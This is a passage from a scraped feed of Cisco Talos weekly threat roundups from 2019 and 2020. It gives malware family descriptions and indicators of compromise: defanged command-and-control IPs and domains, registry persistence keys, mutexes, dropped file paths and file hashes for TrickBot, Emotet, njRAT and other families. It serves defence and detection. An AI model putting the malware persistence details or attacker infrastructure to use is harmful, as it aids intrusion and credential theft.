vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction. \nMadshi injection detected \\- (2740) \nMadshi is a code injection framework that uses process injection to start a new thread if other methods to start a thread within a process fail. This framework is used by a number of security solutions. It is also possible for malware to use this technique. \nKovter injection detected \\- (1860) \nA process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns. \nProcess hollowing detected \\- (1503) \nProcess hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead. \nTrickbot malware detected \\- (1131) \nTrickbot is a banking Trojan which appeared in late 2016. Due to the similarities between Trickbot and Dyre, it is suspected some of the individuals responsible for Dyre are now responsible for Trickbot. Trickbot has been rapidly evolving over the months since it has appeared. However, Trickbot is still missing some of the capabilities Dyre possessed. Its current modules include DLL injection, system information gathering, and email searching. \nGamarue malware detected \\- (205) \nGamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system. \nInstallcore adware detected \\- (128) \nInstall core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware. \nExcessively long PowerShell command detected \\- (95) \nA PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats. \nPowerShell file-less infection detected \\- (89) \nA PowerShell command was stored in an environment variable and run. The environment variable is commonly set by a previously run script and is used as a means of evasion. This behavior is a known tactic of the Kovter and Poweliks malware families. \nFusion adware detected \\- (41) \nFusion (or FusionPlayer) is an adware family that displays unwanted advertising in the form of popups or by injecting into browsers and altering advertisements on webpages. Adware is known to sometimes download and install malware. \n \n", "cvss3": {}, "published": "2019-09-13T14:06:47", "type": "talosblog", "title": "Threat Roundup for September 6 to September 13", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-0708"], "modified": "2019-09-13T14:06:47", "id": "TALOSBLOG:2FC8F90E015AB54A7397D49B24BE5B5E", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/GbJCtbTb4Dc/threat-roundup-0906-0913.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-17T23:27:07", "description": "[](<https://1.bp.blogspot.com/-YY2FQl9WGXA/XURYSq-inGI/AAAAAAAAACc/Ko8Q3jzMHrs2tIOdnt-yO6QVWhNtZBrPwCLcBGAs/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg>)\n\nToday, Talos is publishing a glimpse into the most prevalent threats we've observed between Jan. 10 and Jan. 17. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats. \n \nAs a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net. \n \nFor each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found [here](<https://alln-extcloud-storage.cisco.com/blogs/1/2020/01/tru.json_.txt>)that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness. \nThe most prevalent threats highlighted in this roundup are: \n \nThreat Name | Type | Description \n---|---|--- \nWin.Trojan.Chthonic-7516291-1 | Trojan | Chthonic is a banking trojan derived from the Zeus family of banking malware. It is typically spread via phishing emails and attempts to steal sensitive information from an infected machine. Chthonic has also been observed downloading follow-on malware such as Azorult, another information stealer. \nWin.Dropper.Upatre-7524255-0 | Dropper | Upatre is a malicious downloader often used by exploit kits and phishing campaigns. Upatre downloads and executes malicious executables, such as banking malware. \nWin.Malware.TrickBot-7524669-1 | Malware | Trickbot is a banking trojan targeting sensitive information for certain financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB scripts. \nDoc.Dropper.Emotet-7540598-0 | Dropper | Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a wide variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails. Talos recently discovered an uptick in Emotet distribution. For more, click [here](<https://blog.talosintelligence.com/2020/01/stolen-emails-reflect-emotets-organic.html>). \nWin.Packed.njRAT-7532636-1 | Packed | njRAT, also known as Bladabindi, is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes and remotely turn on the victim's webcam and microphone. njRAT was developed by the Sparclyheason group. Some of the largest attacks using this malware date back to 2014. \nWin.Malware.Cerber-7533438-1 | Malware | Cerber is ransomware that encrypts documents, photos, databases and other important files. Historically, this malware would replace files with encrypted versions and add the file extension \".cerber,\" although in more recent campaigns other file extensions are used. \nWin.Packed.Barys-7532466-0 | Packed | This is a trojan and downloader that allows malicious actors to upload files to a victim's computer. \nWin.Packed.Razy-7532659-0 | Packed | Razy is oftentimes a generic detection name for a Windows trojan. It collects sensitive information from the infected host and encrypt the data, and send it to a command and control (C2) server. Information collected might include screenshots. The samples modify auto-execute functionality by setting and creating a value in the registry for persistence. \nWin.Packed.Dridex-7532883-1 | Packed | Dridex is a well-known banking trojan that aims to steal credentials and other sensitive information from an infected machine. \n \n* * *\n\n## Threat Breakdown\n\n### Win.Trojan.Chthonic-7516291-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED \nValue Name: Hidden ` | 11 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM \nValue Name: EnableLUA ` | 11 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WSCSVC \nValue Name: Start ` | 11 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINDEFEND \nValue Name: Start ` | 11 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED \nValue Name: ShowSuperHidden ` | 11 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS \nValue Name: Start ` | 11 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MPSSVC \nValue Name: Start ` | 11 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WUAUSERV \nValue Name: Start ` | 11 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 2827271685 ` | 11 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER \nValue Name: TaskbarNoNotification ` | 11 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER \nValue Name: TaskbarNoNotification ` | 11 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER \nValue Name: HideSCAHealth ` | 11 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER \nValue Name: HideSCAHealth ` | 11 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN ` | 11 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: 2827271685 ` | 11 \nMutexes | Occurrences \n---|--- \n`Frz_State` | 11 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`40[.]91[.]124[.]111` | 11 \n`208[.]100[.]26[.]245` | 11 \n`40[.]67[.]189[.]14` | 5 \n`20[.]45[.]1[.]107` | 5 \n`40[.]90[.]247[.]210` | 2 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`www[.]update[.]microsoft[.]com[.]nsatc[.]net` | 11 \n`trokelnopartunofroner[.]com` | 11 \n`mplusworldofficeupdates[.]com` | 11 \n`imaginyourselfuafe[.]com` | 11 \n`ltdcommprovvetverify[.]com` | 11 \n \n#### File Hashes\n\n` 085b7d3df5bdf13484ad58dc9b34431a98117f0d267ac3aba91cfc0b384ea35f 11185553d3e040f23efc0b0d1a9f0dc813e76cdb84174efcc785193c6d525535 149e6ff5bb2d0d3abdc7fabd4e3f6be1c563e4b57e035ee30b71a7d04c02ef8f 6fb1c35d7c0cf7f33a162c4c4eb99d6c5866880318db7781a34d9e005264985e 72c636ace54abacf4eb3e6e3a4c695e6c2c160dc6097666b249df34f46489b97 7ccdcf694abe81e19e7afc091d2b614872695e6cd9d90abab21622689bf5555d 8549f3a0383c7d65c869c0eba84960011afe71eb501eb90921066992f0b03833 9116b4c639cedb801e6b9a4891cf5af8e61a7d2f1e54390858f0f5e63dff8f42 9b3ad135a115671e8c960f353dd1805a6bbcedb2f9bf866f366bd9410a601862 e03e7f3f2d272bb18bfd138006cadf905b0fd45028327a3ec556ef1cba7c96fc e8da03e309d09fbe36a215769cf0f4b3f8b93cbf3137db0d4db77ce4bde4e534 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n* * *\n\n### Win.Dropper.Upatre-7524255-0\n\n#### Indicators of Compromise\n\nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`91[.]211[.]17[.]201` | 28 \n`173[.]216[.]240[.]56` | 27 \n`38[.]124[.]169[.]187` | 27 \n`188[.]231[.]34[.]130` | 27 \n`176[.]108[.]102[.]76` | 27 \n`104[.]20[.]17[.]242` | 19 \n`104[.]20[.]16[.]242` | 8 \n`174[.]96[.]234[.]86` | 1 \n`69[.]77[.]155[.]3` | 1 \n`38[.]124[.]169[.]178` | 1 \n`38[.]123[.]202[.]3` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`icanhazip[.]com` | 28 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\PRTY8D97.txt` | 27 \n`%TEMP%\\prityviewer.exe` | 27 \n`%TEMP%\\scsiAFCF.log` | 1 \n`%TEMP%\\scsvii.exe` | 1 \n \n#### File Hashes\n\n` 00592846d2880dfa06ea2bb489b90c1a626bc62664e6933cbcb163cea32e1b70 006c6f0e053a633347afb8e2dc1c5f9a3c732fe654844b32c8efa7fb1b6929f7 0105ed02beac29702244d7f1f2b727d3c53e49590626773e5eefb154d626e469 0120db2a1e9c321da2c654f924c48d44f8db9c32e5cecf62f782e5fd3750ed6d 01a44cd682b97252135d9afb72061db7e8ceb87530de59b081bc13481492dbe5 01d5a8081730c45cd3c16bed3572ac37f767422435975961e783eada059f9f57 0246b510696d6e82f4ef63bd567d00fde0b1a5d8c84b5461a53003c9dbf0a507 0293c190511688dd93a031763139557febc330bb1800334e37d14d0c63ecd466 0349359919a3db6665112c77b8687ad370dfb99bd592a8af0efd7fb32e94d9c4 03b212420fccffb3f96bdb68c7952c408ea8e36d0333d8e63048f8d086a88eec 0437d8df6d2cd8b97959b30c2bf8d875ca3832c055e7f26777459f6db0ccd451 04ab31cd4de8cb6313b676c2e511e3ac477c44dcfe9cfe4a62cf77ce81b1e1a3 04f9d97774c2545c681c1463aa5abcd09355e54345bb03e7cc4105ba1ed7303c 052e7d7d29ebb25c5ab42b7262ae657e20f727c48d63f1223503e3f03daa49ad 05f64082854e6332a3ca42f5b25b8c79569f0b03b84568f26bf997efdd334eec 0607df27c26a55485cfdd78c25ca4b02ff5ebdcde2f3bd5b9265eb366e94b6a5 064cb169eae962f176d84cf3ef074871410ca3bab11bf23ce64df46e036a5b7f 0669e65c645527ae11a544a4eea34fd7d4eb7e33a73b26b6dba3399e083b36c8 07ed2f34b113fb661022915db582d15f13c3734fe6ddda2ada51464f7213f192 09239e11b17a303b9e5f02bdd6b1fcf3fdd54de6ff94b3c49bec7b3230548673 092c3f850fa506c6439ac87a9107a0b5504c0025199d7fac8961c01f873adf82 094adba281d8f8a02207f46f90d4c284ce4f1ba47f1fce53d95a068017e9c159 0970d4111acc10bf407b0babfee1c184a604e6be22318f0474afdf50b26daa33 097bea67fb8fcc721538a887ac5a4c9214489cb7c61b278b2db997c17fc51442 0b291d9eebdd2055da99fd4bc56baad1ba06d87aae0e66e7ddfe9c23953c3a29 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-tFLQHAh04jA/XiIv-alPsnI/AAAAAAAADIA/YQHu-15yj2IcIM5BU1P_Xq7WqDkfpltSwCLcBGAsYHQ/s1600/05f64082854e6332a3ca42f5b25b8c79569f0b03b84568f26bf997efdd334eec_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-_MB17XvKgAQ/XiIwDdh8QaI/AAAAAAAADIE/7YvZnFUTfFUife4Iwu915aR7Eh9iutLyACLcBGAsYHQ/s1600/67e646b44748b8bfae88076e4a1e00cf3f12b827836ff86392d63e709552f3b7_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.TrickBot-7524669-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\V1-TZEVE4 ` | 1 \n`<HKCU>\\SOFTWARE\\V1-TZEVE4 \nValue Name: exepath ` | 1 \n`<HKCU>\\SOFTWARE\\V1-TZEVE4 \nValue Name: licence ` | 1 \nMutexes | Occurrences \n---|--- \n`Global\\316D1C7871E10` | 41 \n`Remcos_Mutex_Inj` | 1 \n`v1-TZEVE4` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`188[.]120[.]254[.]68` | 17 \n`78[.]24[.]223[.]88` | 12 \n`198[.]23[.]209[.]201` | 11 \n`185[.]177[.]59[.]163` | 11 \n`5[.]182[.]210[.]109` | 10 \n`181[.]113[.]28[.]146` | 9 \n`164[.]68[.]120[.]60` | 8 \n`185[.]213[.]20[.]246` | 7 \n`195[.]123[.]220[.]178` | 7 \n`181[.]112[.]157[.]42` | 6 \n`146[.]185[.]253[.]191` | 5 \n`5[.]2[.]70[.]145` | 5 \n`188[.]165[.]62[.]34` | 5 \n`185[.]141[.]27[.]190` | 4 \n`69[.]195[.]159[.]158` | 3 \n`181[.]129[.]104[.]139` | 3 \n`45[.]137[.]151[.]198` | 3 \n`51[.]89[.]115[.]124` | 3 \n`172[.]82[.]152[.]11` | 3 \n`172[.]217[.]9[.]243` | 2 \n`52[.]55[.]255[.]113` | 2 \n`190[.]214[.]13[.]2` | 2 \n`181[.]140[.]173[.]186` | 2 \n`45[.]125[.]1[.]34` | 2 \n`79[.]174[.]12[.]245` | 2 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`checkip[.]amazonaws[.]com` | 4 \n`wtfismyip[.]com` | 3 \n`www[.]myexternalip[.]com` | 2 \n`api[.]ip[.]sb` | 2 \n`api[.]ipify[.]org` | 2 \n`250[.]5[.]55[.]69[.]zen[.]spamhaus[.]org` | 1 \n`myexternalip[.]com` | 1 \n`icanhazip[.]com` | 1 \n`ipinfo[.]io` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\<random, matching '[A-F0-9]{4,5}'>.dmp` | 42 \n`%TEMP%\\<random, matching '[a-f0-9]{3,5}'>_appcompat.txt` | 42 \n`%APPDATA%\\DirectTools\\data` | 31 \n`%System32%\\Tasks\\Direct Tools Update` | 31 \n`%APPDATA%\\DirectTools\\settings.ini` | 31 \n`%APPDATA%\\DirectTools` | 31 \n`%APPDATA%\\DIRECTTOOLS\\<original file name>.exe` | 31 \n`%APPDATA%\\gpuhealth` | 10 \n`%System32%\\Tasks\\Task Gpu health` | 10 \n`%APPDATA%\\gpuhealth\\data` | 10 \n`%APPDATA%\\gpuhealth\\settings.ini` | 10 \n`%APPDATA%\\GPUHEALTH\\<original file name>.exe` | 10 \n`%APPDATA%\\DirectTools\\Data\\pwgrab64` | 2 \n`%System32%\\Tasks\\shadowdev` | 1 \n`%APPDATA%\\DirectTools\\data\\pwgrab64_configs` | 1 \n`%APPDATA%\\DirectTools\\data\\pwgrab64_configs\\dpost` | 1 \n \n#### File Hashes\n\n` 0267975d981105107f8003e7a84490d0871017449352a72ecf010ee3639d99b7 0eae61f5dde95c34cf6e6a225a55c8b34ad0149b4c92c96cac7e1dd67d7423d5 1100664b904de4aaeab06a193bb1f0d6e57f0ff0407a2a836e592751ebfac142 12707680fc20d5ed8f75ee6591f81c334a096c96d6866d1ac4caa719fc55ddbc 1c63d9a293d05e5f598a169969ffd39ba0739e17740ba5205323cfa9b2a692dd 209ee235c5ae5b120a8aca752b365519aa91531ef806ed32741f7058b4c4c4fa 2b952b15f735ae3852a5b1add3dfd56b51217b073064f3cccea83b145f3e2f09 2ea8f522a5a55daafca651634e4f269f4fe7e42f222bd92f732e8c3695667c69 2eb32d3912f7e2bff7827040a76cb5b4bee6e56cec7a09b751fbc04085cf87bd 324b9688d45acf12410b42e8ce2532f5a1d077361e905c9ef69bbc812d24a01f 43de46a37c7dc56a5919babc661e2fcfcd611f1d3ff92dbdcd5a61bfeea9b79f 4ab4a600b2c75dfda7438714bc6a2cc87123b95f21372bcdcf5aa33ff73dac74 4c2fdeacf1fccac0fcdc064a5ae38065950531b7f03c2c40b5068379a591394d 4ecc86000dcc587fdf491e6589961d9523b33aa85533f61638278f8f1fd537df 539e39809bcc3ace9256394c5ce3e7626c242d4580c3a15d0a1cc5eab75b4b9f 58b8be166449de4ea71a103e65d7c45e52cc8d6bd95ac0787eecfe8dd12f980f 5cbb5ace573160c815b2e56d85e8bf5092be22887f23e28af9c6fe3fef7039ab 6f1468021e0606d3021c19630e0bd05eb721111f00c2d203efae6bf23f617a1b 75d658a651fa2fdba6930d2a6b6d2ce7491a4b87d214eb830ea3f23cd329c011 76c73a2c8f85847cb72a1ddfe56a3e728598c3a47c94cce44bd9967237039ef5 7d45d177e653e36ae3fb598b0d17acc4895795712fa53c3deb5ba4137b30e73c 7ea58adcd3598f10aa2e81557b20e52db1ef0c89071c28cdc5143af8f9ec02be 87ad53b54453925c0ced0e0f71bbbec7ba9b08afb2f827642dc55e86c0dcb8e9 8b50aa0fc83663e01ddbd06ae779ea3fdf30eaa1a63d6ad385fdca3ec17fd6cc 8b8a7b9fdb397a75cd51d720e32aebc016b2b1947478311f39929a9a43de81b9 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-nfk0oWsee6k/XiIwVfUpWCI/AAAAAAAADIQ/B8NTF6nYtY0ggcurky6zfiHmqc1TjJOYwCLcBGAsYHQ/s1600/5cbb5ace573160c815b2e56d85e8bf5092be22887f23e28af9c6fe3fef7039ab_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-vMxVZpIFnos/XiIwZo1_lsI/AAAAAAAADIU/sq109bklsWQRVTS3Vvum6S3rSu9aVTX0wCLcBGAsYHQ/s1600/5cbb5ace573160c815b2e56d85e8bf5092be22887f23e28af9c6fe3fef7039ab_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Doc.Dropper.Emotet-7540598-0\n\n#### Indicators of Compromise\n\nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`100[.]96[.]181[.]72` | 18 \n`100[.]94[.]213[.]157` | 18 \n`100[.]74[.]125[.]242` | 18 \n`100[.]74[.]241[.]31` | 18 \n`100[.]117[.]63[.]68` | 18 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`www[.]dailygks[.]com` | 18 \n`idnpoker[.]agenbolaterbaik[.]city` | 18 \n`dobrovorot[.]su` | 18 \n`casiroresources[.]com` | 18 \n`isague[.]com` | 18 \nFiles and or directories created | Occurrences \n---|--- \n`%HOMEPATH%\\126.exe` | 18 \n`%TEMP%\\CVRE39.tmp` | 1 \n \n#### File Hashes\n\n` 0e42ea2ebecf3779a9341c0375c8b71f60a88801b3a717d8fe5dec4a2bbee37c 2853b45864dd97b3be97f9acfcc6be83c6024d9b4e5b48d6b56a8c622e106b5e 2c2254c79ef6d0fc9a3c4bb9b865a2694ba00b791042f6f806dc8ae48ff07fa3 35a6c928ace899581d72bbb94aecb90fc54a9ef85b852a12cc77ec1a7fd4a239 3cec47fd33c8debe5e4cee8126ce9d3c977ae39d9baf454f86dd73ba82a87076 3e73a141bcf5c7a18d8fdc94f34102c1e765c5b0f37ff11c1d122463c4629d38 5a0ddb6c22ebb84af02651396e07204801bee4889965dc943cf6e16035771b87 617c999b2244b6e1a787a80a64f8818ae99a0bbd3c5603f95bdc6682c399a1c1 66974cd3270a8bf0aa4af9105ce84960ae7c7425b120b0045624f2615dbcf842 67812a5d87377778d7c2586585d30d7ab4ab6c2c9334844004c12badd5b72eba 71c8341327d3285f1f3c7ad62fdc102fd6a662c68a2f3a98eac7d0d9f5d6ea7b 92ad35b60997f88c37b57dc1fbb525217375289fab05ea7ba5d6c67ed1d00edf 947dd402232ac165d5c9286e67996e725bfe0c530f969aacea44e7979676fb45 aeed3ac02a448f72ef07047693ee9292d68a54049923a1ec4a53694d517cf048 b29038b3debfd28466ba4ea6e626143187bcd998bf442048a56f4737eb0d85fd d1a0bf24f3c653cd6c7f75b8c51c92cec21fc74d04ce8749bf68a5ad7e40b151 d2be052e9a55cc6eada8d74f6b5c614584588797ee7107e17b2811fb47e3d724 eff598d5a0c0ecaa0d8243173520ef331e71fb60c33b94d24932219c9e27abb9 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-04TG3bF-RfI/XiIwmtBmWTI/AAAAAAAADIc/2UsbzDv2yl8QP2mHRBol8-zFlE-ThTLuQCLcBGAsYHQ/s1600/3e73a141bcf5c7a18d8fdc94f34102c1e765c5b0f37ff11c1d122463c4629d38_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-m30S64kTdas/XiIwpCvCPFI/AAAAAAAADIg/wQGmRCS1Pf8IRzRt-5Lbcc-WDjUvYILQwCLcBGAsYHQ/s1600/3e73a141bcf5c7a18d8fdc94f34102c1e765c5b0f37ff11c1d122463c4629d38_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-5rUB6N5REL8/XiIwthO7gSI/AAAAAAAADIo/tOVHV4ZSTu0vB8fw5jNYg_pEi6kDvepiACLcBGAsYHQ/s1600/aeed3ac02a448f72ef07047693ee9292d68a54049923a1ec4a53694d517cf048_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Packed.njRAT-7532636-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKU>\\S-1-5-21-2580483871-590521980-3826313501-500 \nValue Name: di ` | 22 \n`<HKCU>\\ENVIRONMENT \nValue Name: SEE_MASK_NOZONECHECKS ` | 22 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON \nValue Name: ParseAutoexec ` | 22 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 9b900e9e6a204ac0d795c328b297a541 ` | 1 \n`<HKCU>\\SOFTWARE\\9B900E9E6A204AC0D795C328B297A541 \nValue Name: [kl] ` | 1 \n`<HKCU>\\SOFTWARE\\3E80006ED1A558F4A4E8C67B4482A653 ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 3e80006ed1a558f4a4e8c67b4482a653 ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 3e80006ed1a558f4a4e8c67b4482a653 ` | 1 \n`<HKCU>\\SOFTWARE\\3E80006ED1A558F4A4E8C67B4482A653 \nValue Name: [kl] ` | 1 \n`<HKCU>\\SOFTWARE\\BAC5BD34B5EC131B955ED0D6686691C0 ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: bac5bd34b5ec131b955ed0d6686691c0 ` | 1 \n`<HKCU>\\SOFTWARE\\8B9C85CEA1B5BC95470D5B663265ABBA ` | 1 \n`<HKCU>\\SOFTWARE\\EE265A490F50F82D7DA78B5AFC5D4BF1 ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: bac5bd34b5ec131b955ed0d6686691c0 ` | 1 \n`<HKCU>\\SOFTWARE\\BAC5BD34B5EC131B955ED0D6686691C0 \nValue Name: [kl] ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 8b9c85cea1b5bc95470d5b663265abba ` | 1 \n`<HKCU>\\SOFTWARE\\EE265A490F50F82D7DA78B5AFC5D4BF1 \nValue Name: [kl] ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 8b9c85cea1b5bc95470d5b663265abba ` | 1 \n`<HKCU>\\SOFTWARE\\8B9C85CEA1B5BC95470D5B663265ABBA \nValue Name: [kl] ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: driver ` | 1 \n`<HKCU>\\SOFTWARE\\1BB40C47BEAE292B8957771D185E2963 ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 1bb40c47beae292b8957771d185e2963 ` | 1 \n`<HKCU>\\SOFTWARE\\E44B3D2D77E82BFAA8FBE232C3FAC08B ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 1bb40c47beae292b8957771d185e2963 ` | 1 \n`<HKCU>\\SOFTWARE\\1BB40C47BEAE292B8957771D185E2963 \nValue Name: [kl] ` | 1 \nMutexes | Occurrences \n---|--- \n`<32 random hex characters>` | 22 \n`Random` | 3 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`46[.]246[.]13[.]73` | 1 \n`41[.]97[.]3[.]243` | 1 \n`41[.]102[.]190[.]225` | 1 \n`91[.]109[.]176[.]6` | 1 \n`84[.]236[.]13[.]94` | 1 \n`41[.]226[.]95[.]248` | 1 \n`197[.]167[.]16[.]253` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`cadastroseguro2016[.]ddns[.]net` | 3 \n`kounan-19[.]no-ip[.]org` | 1 \n`sasbab[.]ddns[.]net` | 1 \n`pubguk[.]linkpc[.]net` | 1 \n`najor123[.]ddns[.]net` | 1 \n`neonka99[.]ddns[.]net` | 1 \n`no` | 1 \n`skyfall2017[.]ddns[.]net` | 1 \n`service-updater[.]hopto[.]org` | 1 \n`eslam[.]no-ip[.]org` | 1 \n`tigano0724[.]myq-see[.]com` | 1 \n`ghostprocess[.]no-ip[.]info` | 1 \n`taki[.]ddns[.]net` | 1 \n`crazyevil3[.]ddns[.]net` | 1 \n`systemo32[.]publicvm[.]com` | 1 \n`rooowl1999[.]no-ip[.]biz` | 1 \n`kamel23[.]noip[.]me` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\svchost.exe` | 4 \n`%TEMP%\\server.exe` | 4 \n`%TEMP%\\<random, matching '[a-z]{4,9}'>.exe` | 4 \n`%APPDATA%\\server.exe` | 2 \n`%APPDATA%\\svhost.exe` | 1 \n`%HOMEPATH%\\server.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\16d577f1045ea00e0472332fe1885e1f.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\2eed382eb0cd52422d5fda835a5d88b5.exe` | 1 \n`%TEMP%\\pc.exe` | 1 